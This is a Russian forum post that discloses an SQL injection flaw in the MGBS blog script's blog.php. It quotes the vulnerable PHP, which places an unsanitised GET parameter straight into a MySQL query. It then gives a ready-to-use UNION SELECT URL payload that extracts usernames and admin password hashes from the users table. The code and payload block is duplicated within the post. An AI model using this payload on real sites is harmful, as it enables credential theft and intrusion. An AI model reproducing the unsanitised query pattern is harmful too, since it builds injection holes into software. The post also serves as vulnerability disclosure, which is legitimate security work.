The_HuliGun
21.01.2008, 23:35
Скрипт (http://sourceforge.net/project/showfiles.php?group_id=193233) блога MGBS содержит багу типа sql injection. Уязвим сценарий blog.php:
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...
md5 хеш админа
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/*
Бага найдена мной вчера и опубликована на милворме (http://milw0rm.com/exploits/4951)
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...
md5 хеш админа
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/*
Бага найдена мной вчера и опубликована на милворме (http://milw0rm.com/exploits/4951)